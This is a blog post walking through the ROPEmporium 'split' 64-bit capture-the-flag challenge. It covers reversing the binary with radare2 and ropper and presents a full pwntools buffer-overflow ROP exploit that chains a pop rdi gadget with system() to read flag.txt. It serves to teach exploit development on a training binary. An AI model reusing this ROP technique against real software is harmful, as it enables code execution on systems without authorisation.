<!doctype html><html lang=en-us><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=generator content="Hugo 0.62.1 with theme Tranquilpeak 0.4.7-BETA"><meta name=author content="Christoffer Claesson"><meta name=keywords content><meta name=description content="Doing a ROPEmporium Series, time to switch it up with Split!"><meta property="og:description" content="Doing a ROPEmporium Series, time to switch it up with Split!"><meta property="og:type" content="article"><meta property="og:title" content="ROPEmporium: 1-Split (64-bit)"><meta name=twitter:title content="ROPEmporium: 1-Split (64-bit)"><meta property="og:url" content="https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><meta property="twitter:url" content="https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><meta property="og:site_name" content="Securitybits.io"><meta property="og:description" content="Doing a ROPEmporium Series, time to switch it up with Split!"><meta name=twitter:description content="Doing a ROPEmporium Series, time to switch it up with Split!"><meta property="og:locale" content="en-us"><meta property="article:published_time" content="2019-08-10T00:00:00"><meta property="article:modified_time" content="2019-08-10T00:00:00"><meta property="article:section" content="Exploit-Development"><meta property="article:section" content="ROPEmporium"><meta property="article:section" content="CTF"><meta property="article:tag" content="ctf"><meta property="article:tag" content="dev"><meta property="article:tag" content="getting-started"><meta property="article:tag" content="ropemporium"><meta property="article:tag" content="rop"><meta property="article:tag" content="exploit"><meta name=twitter:card content="summary"><meta name=twitter:site content="@Securitybits_io"><meta name=twitter:creator content="@Securitybits_io"><meta property="og:image" content="https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/GTY_Hacker.jpg"><meta property="twitter:image" content="https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/GTY_Hacker.jpg"><meta property="og:image" content="https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/GTY_Hacker.jpg"><meta property="twitter:image" content="https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/GTY_Hacker.jpg"><meta property="og:image" content="https://securitybits-io.github.io/img/profile.jpg"><meta property="twitter:image" content="https://securitybits-io.github.io/img/profile.jpg"><title>ROPEmporium: 1-Split (64-bit)</title><link rel=icon href=https://securitybits-io.github.io/favicon.png><link rel=canonical href=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin=anonymous><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin=anonymous><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin=anonymous><link rel=stylesheet href=https://securitybits-io.github.io/css/style-twzjdbqhmnnacqs0pwwdzcdbt8yhv8giawvjqjmyfoqnvazl0dalmnhdkvp7.min.css></head><body><div id=blog><header id=header data-behavior=5><i id=btn-open-sidebar class="fa fa-lg fa-bars"></i><div class=header-title><a class=header-title-link href=https://securitybits-io.github.io/>Securitybits.io</a></div><a class=header-right-picture href=https://securitybits-io.github.io/#about><img class=header-picture src=https://securitybits-io.github.io/img/profile.jpg alt="Author's picture"></a></header><nav id=sidebar data-behavior=5><div class=sidebar-container><div class=sidebar-profile><a href=https://securitybits-io.github.io/#about><img class=sidebar-profile-picture src=https://securitybits-io.github.io/img/profile.jpg alt="Author's picture"></a><h4 class=sidebar-profile-name>Christoffer Claesson</h4><h5 class=sidebar-profile-bio>Security ramblings from a viking!</h5></div><ul class=sidebar-buttons><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/><i class="sidebar-button-icon fa fa-lg fa-home"></i><span class=sidebar-button-desc>Home</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/categories><i class="sidebar-button-icon fa fa-lg fa-bookmark"></i><span class=sidebar-button-desc>Categories</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/tags><i class="sidebar-button-icon fa fa-lg fa-tags"></i><span class=sidebar-button-desc>Tags</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/archives><i class="sidebar-button-icon fa fa-lg fa-archive"></i><span class=sidebar-button-desc>Archives</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/page/about-me><i class="sidebar-button-icon fa fa-lg fa-question"></i><span class=sidebar-button-desc>About Me</span></a></li></ul><ul class=sidebar-buttons><li class=sidebar-button><a class=sidebar-button-link href=https://github.com/Securitybits-io target=_blank rel=noopener><i class="sidebar-button-icon fa fa-lg fa-github"></i><span class=sidebar-button-desc>GitHub</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://twitter.com/Securitybits_io target=_blank rel=noopener><i class="sidebar-button-icon fa fa-lg fa-twitter"></i><span class=sidebar-button-desc>Twitter</span></a></li><li class=sidebar-button><a class=sidebar-button-link href=https://keybase.io/securitybits target=_blank rel=noopener><i class="sidebar-button-icon fa fa-lg fa-code-fork"></i><span class=sidebar-button-desc>Keybase.io</span></a></li></ul><ul class=sidebar-buttons><li class=sidebar-button><a class=sidebar-button-link href=https://securitybits-io.github.io/index.xml><i class="sidebar-button-icon fa fa-lg fa-rss"></i><span class=sidebar-button-desc>RSS</span></a></li></ul></div></nav><div class="post-header-cover
text-center
post-header-cover--partial" style=background-image:url(/img/posts/2019/08/ropemporium-1-split/GTY_Hacker.jpg) data-behavior=5></div><div id=main data-behavior=5 class="hasCover
hasCoverMetaOut"><article class=post itemscope itemtype=http://schema.org/BlogPosting><div class="post-header main-content-wrap text-center"><h1 class=post-title itemprop=headline>ROPEmporium: 1-Split (64-bit)</h1><div class="postShorten-meta post-meta"><time itemprop=datePublished datetime=2019-08-10T00:00:00Z>August 10, 2019</time>
<span>in</span>
<a class=category-link href=https://securitybits-io.github.io/categories/exploit-development>Exploit-Development</a>,
<a class=category-link href=https://securitybits-io.github.io/categories/ropemporium>ROPEmporium</a>,
<a class=category-link href=https://securitybits-io.github.io/categories/ctf>CTF</a></div></div><div class="post-content markdown" itemprop=articleBody><div class=main-content-wrap><p>Before you read any further go back and have a look on my previous <a href=https://blog.securitybits.io/2019/08/08/ropemporium-0-ret2win/>ROPEmporium</a> post, as this post will build on that knowledge. But also have some familiarity of</p><ul><li>GDB</li><li>Radare2</li><li>Assembly</li></ul><p>This round we'll use the same tools as in 0-ret2win, with the addition to <a href=https://github.com/sashs/Ropper>Ropper</a> as we have to find and use specific gadgets to make the 64-bit exploit.</p><h2 id=description>Description</h2><blockquote><p>I'll let you in on a secret; that useful string &ldquo;/bin/cat flag.txt&rdquo; is still present in this binary, as is a call to system(). It's just a case of finding them and chaining them together to make the magic happen.</p></blockquote><h2 id=setup>Setup</h2><p>Again lets download and do some initial analysis of the binary</p><pre><code>root@linux:~/split# wget https://ropemporium.com/binary/split.zip
root@linux:~/split# unzip split.zip
root@linux:~/split# ls
flag.txt split split.zip
root@linux:~/split# file split
split: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8cbc19d1114b70bce2305f7ded9e7dd4d2e28069, not stripped
</code></pre><p>Awesome, still not stripped and we downloaded the proper 64-bit ELF Executable. We can also execute it to look on the program execution flow and what input data it wants.</p><pre><code>root@Valkyrie:~/Documents/courses/ropemporium/1-split# ./split
split by ROP Emporium
64bits
Contriving a reason to ask user for data...
&gt; inputdata
Exiting
</code></pre><p>So the basic flow is similar to ret2win, no surprise there as this exercise is more looking at the assembly, but again the user is required to input data after the <em>"> &ldquo;</em>. Much like 0-Ret2Win the offset to our junk in order to control RIP is 40 bytes, and i am intentionally skipping the details in this step to focus more on the ROP Chain.</p><p>So again create the exploit template using pwntools</p><pre><code>root@Valkyrie:~/Documents/courses/ropemporium/1-split# \
&gt; pwn template --host 127.0.0.1 --port 31337 split --quiet &gt; exploit.py
</code></pre><p>And again keeping with the standard, adding the 40-byte junk and payload definition</p><pre><code>[...snip...]
# -- Exploit goes here --
junk = 'A'*40

payload = &quot;&quot;
payload += junk

io = start()
io.recvuntil('&gt; ')
io.sendline(payload)
io.interactive()
</code></pre><p>So lets start reversing the binary and look for the gadgets that we have to use.</p><h2 id=radare2-reversing>Radare2 Reversing</h2><p>Analyzing the binary first with rabin2, to have a look on its protections we can see that the <code>nx: true</code> also that <code>stripped: false</code> . So again a ROP Chain is the key to success!</p><pre><code>root@Valkyrie:~/Documents/courses/ropemporium/1-split# rabin2 -I split
arch x86
baddr 0x400000
binsz 7137
bintype elf
bits 64
canary false
class ELF64
compiler GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crypto false
endian little
havecode true
intrp /lib64/ld-linux-x86-64.so.2
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
maxopsz 16
minopsz 1
nx true
os linux
pcalign 0
pic false
relocs true
relro partial
rpath NONE
sanitiz false
static false
stripped false
subsys linux
va true
</code></pre><p>So lets open the binary in Radare2 and look for our ROP Chain.</p><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-8.png title="Radare2 Reversing" data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-8.png alt="Radare2 Reversing"></a>
<span class=caption>Radare2 Reversing</span></div><p>So in the challenge description we got the hint that there are still a useful function, but also a useful string which have been split apart! Investigating both the <code>sym.usefulFunction</code> and <code>obj.usefulString</code> we can slowly see the parts that we have to use in order to print the <code>flag.txt</code>.</p><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-9.png title="Radare2 Symbols and useful functions" data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-9.png alt="Radare2 Symbols and useful functions"></a>
<span class=caption>Radare2 Symbols and useful functions</span></div><p>Above is the function in 1-split that contains the gadget system, but it's also apparent that it wont print us the flag by simply calling the function. Since the edi will be filled with the pointer to the string <code>str.bin_ls</code> (/bin/ls) and will thus only print out the files in the current directory. While this proves code execution or command injection&mldr; doesn't help us getting that flag! What we really want is to call the obj.usefulString as an argument to system</p><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-10.png title="Radare2 Strings" data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-10.png alt="Radare2 Strings"></a>
<span class=caption>Radare2 Strings</span></div><p>That will certainly print us the flag. But the next question is&mldr;. how can we change the calling string to system if it is hard coded into the binary?</p><h3 id=anatomy-of-a-rop-chain>Anatomy of a ROP Chain</h3><p>Now in order to dig a little into the calling convention of system calls in Linux we have to consult the ever exiting man page. Running <code>man system</code> in a terminal we are presented the manual for the library function <code>system()</code>.  </p><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-11.png title="manpage of system()" data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-11.png alt="manpage of system()"></a>
<span class=caption>manpage of system()</span></div><p>If we have a brief look into the description of the system call, we can identify that the calling convention is <code>system(&lt;string of what to be executed>)</code> , so the first parameter is the command to run. Which follows the principle in <code>sym.usefulFunction</code> as the string before system is <code>/bin/ls</code>. Which in turn is placed in the <code>edi</code> register just before the call to <code>system()</code></p><pre><code>sym.usefulFunction ();
0x0040080b bfff084000 mov edi, str.bin_ls ;0x4008ff ; &quot;/bin/ls&quot; ; const char *string
0x00400810 e8cbfdffff call sym.imp.system ;int system(const char *string)
</code></pre><p>Now there's a really good paper <a href=https://cs.brown.edu/courses/cs033/docs/guides/x64_cheatsheet.pdf>x64-Cheatsheet.pdf</a> which explains a lot of the calls and methods in 64-bit assembly. A direct quote in the paper states that</p><blockquote><p>4.3 Register Usage<br>Additionally, %rdi, %rsi, %rdx, %rcx, %r8, and %r9 are used to pass the first six integer or pointer parameters to called functions. Additional parameters (or large parameters such as structs passed by value) are passed on the stack.</p></blockquote><p>Which means that it should look something like:</p><pre><code>+-----------------------------------------------------------+
| Call      First   Second  Third   Fourth  Fifth   Sixth   |
| System()  %rdi    %rsi    %rdx    %rcx    %r8     %r9     |
+-----------------------------------------------------------+
</code></pre><p>Now we know that we need to move <code>obj.usefulString</code> into the first argument before calling <code>system()</code>, which should correlate to the <code>%RDI Register</code>, And there are three basic ways to achieve this and move data around in assembly:</p><ul><li>push - push register onto top of stack</li><li>pop - pop top of stack onto register</li><li>mov - move source to destination</li></ul><p>But scrolling through the radare2 assembly can be a bit tedious, and there are a search function in radare2 to look for gadgets and specific calls, but its time to introduce ropper which will automagically find all the gadgets available to us in the binary or a glibc (though not necessary in the ROPEmporium challenges). So hunting for gadgets can be a bit tricky, as it usually requires to have a bunch of information and make assumptions as you go. luckily for us this time we only need one gadget this time, a <code>pop rdi</code>.</p><pre><code>root@Valkyrie:~/Documents/courses/ropemporium/1-split# ropper -f split
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
Gadgets
=======
[...snip...]
0x00000000004006b0: pop rbp; ret;
0x0000000000400883: pop rdi; ret;
0x0000000000400881: pop rsi; pop r15; ret;
[...snip...]
91 gadgets found
</code></pre><p>Ropper identified that on address <code>0x00400883</code> theres a <code>pop rdi; ret</code>, which is easily verified in radare2 with <code>pdi 2 @ 0x00400883</code></p><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-12.png title="pop rdi instruction" data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-12.png alt="pop rdi instruction"></a>
<span class=caption>pop rdi instruction</span></div><h3 id=constructing-the-rop-chain>Constructing the ROP Chain</h3><p>Now that we've identified the 3 parts we need in order to print the flag, its due time to start the assembly (No pun intended). This is something that we have to do in a specific order, which is more important in the later challenges but easier to understand now.</p><p>In order to call system with the string, we need to place the string into the RDI register before the system call. And since the <code>pop rdi</code> takes the <em>next stack address</em> and pops it into the register, the pop call needs to be right before the string address. so the chain have to look something like this</p><pre><code>[junk] + [pop rdi] + [usefulString] + [system]
</code></pre><p>Which is easily constructed in our exploit code, now that we have all the parts needed.</p><h2 id=split>Split</h2><p>This time we'll go straight to pwntools, but you can substitute the names for binary addresses if you want. So the different parts we need just to reiterate are</p><ul><li>Junk - which is <code>'A'*40</code> in order to control RIP and execute our own addresses</li><li>usefulString - <code>exe.symbols.usefulString</code> the address to <code>/bin/cat flag.txt</code></li><li>System() - <code>exe.symbols.system</code> to create the system call</li><li>pop rdi - <code>0x00400883</code> to put the next stack address onto the proper register</li></ul><p>And in the final exploit we'll use pwntools function p64(address) in order to convert a memory address into a packed string.</p><h3 id=final-exploit>Final Exploit</h3><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#75715e>#Author: Christoffer.Claesson@Securitybits.io</span>
<span style=color:#75715e>#Blog: https://blog.securitybits.io/2019/08/10/ropemporium-1-split-64-bit/</span>

<span style=color:#75715e>#!/usr/bin/env python2</span>
<span style=color:#75715e># -*- coding: utf-8 -*-</span>
<span style=color:#f92672>from</span> pwn <span style=color:#f92672>import</span> <span style=color:#f92672>*</span>

exe <span style=color:#f92672>=</span> context<span style=color:#f92672>.</span>binary <span style=color:#f92672>=</span> ELF(<span style=color:#e6db74></span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>split</span><span style=color:#e6db74>&#39;</span>)

host <span style=color:#f92672>=</span> args<span style=color:#f92672>.</span>HOST <span style=color:#f92672>or</span> <span style=color:#e6db74></span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>127.0.0.1</span><span style=color:#e6db74>&#39;</span>
port <span style=color:#f92672>=</span> int(args<span style=color:#f92672>.</span>PORT <span style=color:#f92672>or</span> <span style=color:#ae81ff>31337</span>)

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>local</span>(argv<span style=color:#f92672>=</span>[], <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw):
    <span style=color:#e6db74></span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#e6db74>Execute the target binary locally</span><span style=color:#e6db74>&#39;&#39;&#39;</span>
    <span style=color:#66d9ef>if</span> args<span style=color:#f92672>.</span>GDB:
        <span style=color:#66d9ef>return</span> gdb<span style=color:#f92672>.</span>debug([exe<span style=color:#f92672>.</span>path] <span style=color:#f92672>+</span> argv, gdbscript<span style=color:#f92672>=</span>gdbscript, <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw)
    <span style=color:#66d9ef>else</span>:
        <span style=color:#66d9ef>return</span> process([exe<span style=color:#f92672>.</span>path] <span style=color:#f92672>+</span> argv, <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw)

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>remote</span>(argv<span style=color:#f92672>=</span>[], <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw):
    <span style=color:#e6db74></span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#e6db74>Connect to the process on the remote host</span><span style=color:#e6db74>&#39;&#39;&#39;</span>
    io <span style=color:#f92672>=</span> connect(host, port)
    <span style=color:#66d9ef>if</span> args<span style=color:#f92672>.</span>GDB:
        gdb<span style=color:#f92672>.</span>attach(io, gdbscript<span style=color:#f92672>=</span>gdbscript)
    <span style=color:#66d9ef>return</span> io

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>start</span>(argv<span style=color:#f92672>=</span>[], <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw):
    <span style=color:#e6db74></span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#e6db74>Start the exploit against the target.</span><span style=color:#e6db74>&#39;&#39;&#39;</span>
    <span style=color:#66d9ef>if</span> args<span style=color:#f92672>.</span>LOCAL:
        <span style=color:#66d9ef>return</span> local(argv, <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw)
    <span style=color:#66d9ef>else</span>:
        <span style=color:#66d9ef>return</span> remote(argv, <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span><span style=color:#f92672>*</span>kw)

gdbscript <span style=color:#f92672>=</span> <span style=color:#e6db74></span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#e6db74>
</span><span style=color:#e6db74></span><span style=color:#e6db74>break *0x{exe.symbols.main:x}</span><span style=color:#e6db74>
</span><span style=color:#e6db74></span><span style=color:#e6db74>continue</span><span style=color:#e6db74>
</span><span style=color:#e6db74></span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#f92672>.</span>format(<span style=color:#f92672>*</span><span style=color:#f92672>*</span>locals())

<span style=color:#75715e># -- Exploit goes here --</span>
junk <span style=color:#f92672>=</span> <span style=color:#e6db74></span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>A</span><span style=color:#e6db74>&#39;</span><span style=color:#f92672>*</span><span style=color:#ae81ff>40</span> <span style=color:#75715e>#Controlling RIP Register</span>
usefulString <span style=color:#f92672>=</span> p64(exe<span style=color:#f92672>.</span>symbols<span style=color:#f92672>.</span>usefulString) <span style=color:#75715e>#/bin/cat flag.txt</span>
system <span style=color:#f92672>=</span> p64(exe<span style=color:#f92672>.</span>symbols<span style=color:#f92672>.</span>system) <span style=color:#75715e>#Creating the system call</span>
pop_rdi <span style=color:#f92672>=</span> p64(<span style=color:#ae81ff>0x00400883</span>) <span style=color:#75715e>#Putting the string onto RDI</span>

payload <span style=color:#f92672>=</span> <span style=color:#e6db74></span><span style=color:#e6db74>&#34;</span><span style=color:#e6db74>&#34;</span>
payload <span style=color:#f92672>+</span><span style=color:#f92672>=</span> junk
payload <span style=color:#f92672>+</span><span style=color:#f92672>=</span> pop_rdi
payload <span style=color:#f92672>+</span><span style=color:#f92672>=</span> usefulString
payload <span style=color:#f92672>+</span><span style=color:#f92672>=</span> system

io <span style=color:#f92672>=</span> start()
io<span style=color:#f92672>.</span>recvuntil(<span style=color:#e6db74></span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>&gt; </span><span style=color:#e6db74>&#39;</span>)
io<span style=color:#f92672>.</span>sendline(payload)
log<span style=color:#f92672>.</span>success(<span style=color:#e6db74></span><span style=color:#e6db74>&#39;</span><span style=color:#e6db74>Flag: </span><span style=color:#e6db74>&#39;</span> <span style=color:#f92672>+</span> io<span style=color:#f92672>.</span>recv(<span style=color:#ae81ff>512</span>))
</code></pre></div><div class="figure center"><a class=fancybox href=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-13.png title=Flag data-fancybox-group><img class=fig-img src=https://securitybits-io.github.io/img/posts/2019/08/ropemporium-1-split/image-13.png alt=Flag></a>
<span class=caption>Flag</span></div><p>GitHub: <a href=https://github.com/Securitybits-io/ROPEmporium>https://github.com/Securitybits-io/ROPEmporium</a></p></div></div><div id=post-footer class="post-footer main-content-wrap"><div class=post-actions-wrap><nav><ul class="post-actions post-action-nav"><li class=post-action><a class="post-action-btn btn btn--default tooltip--top" href=https://securitybits-io.github.io/2019/08/ropemporium-2-callme-64-bit/ data-tooltip="ROPEmporium: 2-Callme (64-bit)"><i class="fa fa-angle-left"></i><span class="hide-xs hide-sm text-small icon-ml">NEXT</span></a></li><li class=post-action><a class="post-action-btn btn btn--default tooltip--top" href=https://securitybits-io.github.io/2019/08/ropemporium-0-ret2win-64-bit/ data-tooltip="ROPEmporium: 0-Ret2Win (64-bit)"><span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
<i class="fa fa-angle-right"></i></a></li></ul></nav><ul class="post-actions post-action-share"><li class="post-action hide-lg hide-md hide-sm"><a class="post-action-btn btn btn--default btn-open-shareoptions" href=#btn-open-shareoptions><i class="fa fa-share-alt"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://www.facebook.com/sharer/sharer.php?u=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-facebook-official"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://twitter.com/intent/tweet?text=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-twitter"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://plus.google.com/share?url=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-google-plus"></i></a></li><li class=post-action><a class="post-action-btn btn btn--default" href=#><i class="fa fa-list"></i></a></li></ul></div></div></article><footer id=footer class=main-content-wrap><span class=copyrights>&copy; 2020 Christoffer Claesson. All Rights Reserved</span></footer></div><div id=bottom-bar class=post-bottom-bar data-behavior=5><div class=post-actions-wrap><nav><ul class="post-actions post-action-nav"><li class=post-action><a class="post-action-btn btn btn--default tooltip--top" href=https://securitybits-io.github.io/2019/08/ropemporium-2-callme-64-bit/ data-tooltip="ROPEmporium: 2-Callme (64-bit)"><i class="fa fa-angle-left"></i><span class="hide-xs hide-sm text-small icon-ml">NEXT</span></a></li><li class=post-action><a class="post-action-btn btn btn--default tooltip--top" href=https://securitybits-io.github.io/2019/08/ropemporium-0-ret2win-64-bit/ data-tooltip="ROPEmporium: 0-Ret2Win (64-bit)"><span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
<i class="fa fa-angle-right"></i></a></li></ul></nav><ul class="post-actions post-action-share"><li class="post-action hide-lg hide-md hide-sm"><a class="post-action-btn btn btn--default btn-open-shareoptions" href=#btn-open-shareoptions><i class="fa fa-share-alt"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://www.facebook.com/sharer/sharer.php?u=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-facebook-official"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://twitter.com/intent/tweet?text=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-twitter"></i></a></li><li class="post-action hide-xs"><a class="post-action-btn btn btn--default" target=new href="https://plus.google.com/share?url=https://securitybits-io.github.io/2019/08/ropemporium-1-split-64-bit/"><i class="fa fa-google-plus"></i></a></li><li class=post-action><a class="post-action-btn btn btn--default" href=#><i class="fa fa-list"></i></a></li></ul></div></div><div id=share-options-bar class=share-options-bar data-behavior=5><i id=btn-close-shareoptions class="fa fa-close"></i><ul class=share-options><li class=share-option><a class=share-option-btn target=new href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fsecuritybits-io.github.io%2F2019%2F08%2Fropemporium-1-split-64-bit%2F"><i class="fa fa-facebook-official"></i><span>Share on Facebook</span></a></li><li class=share-option><a class=share-option-btn target=new href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fsecuritybits-io.github.io%2F2019%2F08%2Fropemporium-1-split-64-bit%2F"><i class="fa fa-twitter"></i><span>Share on Twitter</span></a></li><li class=share-option><a class=share-option-btn target=new href="https://plus.google.com/share?url=https%3A%2F%2Fsecuritybits-io.github.io%2F2019%2F08%2Fropemporium-1-split-64-bit%2F"><i class="fa fa-google-plus"></i><span>Share on Google+</span></a></li></ul></div><div id=share-options-mask class=share-options-mask></div></div><div id=about><div id=about-card><div id=about-btn-close><i class="fa fa-remove"></i></div><img id=about-card-picture src=https://securitybits-io.github.io/img/profile.jpg alt="Author's picture"><h4 id=about-card-name>Christoffer Claesson</h4><div id=about-card-bio>Security ramblings from a viking!</div><div id=about-card-job><i class="fa fa-briefcase"></i><br>Senior Penetration Tester</div><div id=about-card-location><i class="fa fa-map-marker"></i><br>Sweden</div></div></div><div id=cover style=background-image:url(https://securitybits-io.github.io/img/side-banner.jpg)></div><script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin=anonymous></script><script src=https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin=anonymous></script><script src=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin=anonymous></script><script src=https://securitybits-io.github.io/js/script-pcw6v3xilnxydl1vddzazdverrnn9ctynvnxgwho987mfyqkuylcb1nlt.min.js></script><script lang=javascript>window.onload=updateMinWidth;window.onresize=updateMinWidth;document.getElementById("sidebar").addEventListener("transitionend",updateMinWidth);function updateMinWidth(){var sidebar=document.getElementById("sidebar");var main=document.getElementById("main");main.style.minWidth="";var w1=getComputedStyle(main).getPropertyValue("min-width");var w2=getComputedStyle(sidebar).getPropertyValue("width");var w3=getComputedStyle(sidebar).getPropertyValue("left");main.style.minWidth=`calc(${w1} - ${w2} - ${w3})`;}</script><script>$(document).ready(function(){hljs.configure({classPrefix:'',useBR:false});$('pre.code-highlight > code, pre > code').each(function(i,block){if(!$(this).hasClass('codeblock')){$(this).addClass('codeblock');}
hljs.highlightBlock(block);});});</script></body></html>